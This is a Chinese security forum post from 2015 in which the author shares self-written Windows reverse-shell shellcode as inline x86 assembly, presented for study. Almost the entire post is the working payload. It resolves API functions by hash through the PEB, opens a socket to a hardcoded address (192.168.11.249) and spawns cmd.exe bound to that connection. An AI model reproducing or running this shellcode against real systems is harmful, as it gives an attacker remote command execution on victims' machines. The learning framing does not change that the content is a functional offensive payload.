-
-
[原创]我也发一个自己写的reverse_bind shellcode代码
-
发表于: 2015-11-29 23:44
-
一直在看0day的那本书,受益匪浅,并根据bindshell那个,自己写了个reverse_bind的反弹端口,留着也没用,分享出来大家一起学习,写的比较啰嗦,请大家指正
#include "stdafx.h"
///
/// by:xiaoyu 2015 9/11
/// reverse_shell for win 7 and win 8
///
void main()
{
__asm
{
cld
//push produce hash value
push 0x630a7771 //inet_addr
push 0xc0577762 //connect
push 0xde78322d //WSASocket
push 0x80b46a3d //WSAStartup
//---------------------ws2_32.dll hash
push 0x6ba6bcc9 //createProcessA
push 0x4fd18963 //ExitProcess
push 0x0c917432 //LoadLibraryA
//-----------------------kernel32.dll hash
mov esi,esp
lea edi,[esi - 0x1c]
//make some stack space(500h)
xor ebx,ebx
mov bh,0x05
sub esp,ebx
mov bx,0x3233 //2 3
push ebx
push 0x5F327377 //_ 2 s w
push esp //ebp = "ws2_32"
xor edx,edx
//get the base of kernel32.dll
mov ebx,fs:[edx+0x30] //peb addr
mov ecx,[ebx + 0x0c] // ldr addr
mov ecx,[ecx + 0x1c] // list frist
mov ecx,[ecx] //kernelbase.dll
mov ecx,[ecx] //kernel32.dll
mov ebp,[ecx+0x08] //base of kernel32.dll
find_lib_functions:
lodsd //send [esi] to eax and add esi
cmp eax,0x80b46a3d
jne find_functions
xchg eax,ebp
call [edi - 0x0c] //LoadLibraryA
xchg eax,ebp
find_functions:
pushad
mov eax,[ebp+0x3c]
mov ecx,[ebp+eax+0x78]
add ecx,ebp
mov ebx,[ecx+0x20]
add ebx,ebp
xor edi,edi
next_function_loop:
inc edi
mov esi,[ebx+edi*4]
add esi,ebp
cdq
//compute hash
hash_loop:
movsx eax,byte ptr[esi]
cmp al,ah
jz compare_hash
ror edx,7
add edx,eax
inc esi
jmp hash_loop
compare_hash:
cmp edx,[esp+0x1c]
jnz next_function_loop
mov ebx,[ecx+0x24]
add ebx,ebp
mov di,[ebx+2*edi]
mov ebx,[ecx+0x1c]
add ebx,ebp
add ebp,[ebx +4*edi]
xchg eax,ebp
pop edi
stosd
push edi
popad
cmp eax,0x630a7771 //if the last one
jne find_lib_functions
function_call: //function module(vip)
//--------------------------------------------------wsastartup(dword,lpwsadata)
push esp
push 0x02
call [edi-0x10] //if WSAStartup worked,eax=0
//-------------------------------------------------WSASocketA(af,type ...)
//clean stack to 0
mov ecx,0x50
mov edi,esp
rep stosd
//create socket
inc eax //eax = 1
push eax
inc eax
push eax
call [esi-0x28]
xchg ebp,eax // ebp = socket handle
add esp,0x20
push 0x00003934 //192.168.11.249
push 0x322e3131
push 0x2e383631
push 0x2e323931
push esp
call [esi-0x20]
add esp,0x20
push eax
push 0x0a1a0002
mov ecx,esp
push 0x10
push ecx
push ebp
call [esi-0x24]
//clean stack to 0
xor eax,eax
mov ecx,0x50
rep stosd
//init startinfo
mov esp,edi
push ebp
push ebp
push ebp
sub esp,0x8
push 0x100
mov [esp-0x2c],0x44
sub esp,0x2c
mov ecx,esp
sub esp,0x10
mov eax,esp
push 0x00646d63
mov edi,esp
//createprocess
push eax
push ecx
push 0
push 0
push 0
push 1
push 0
push 0
push edi
push 0
call [esi-0x30] //createprocess
call [esi-0x34]
}
return;
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
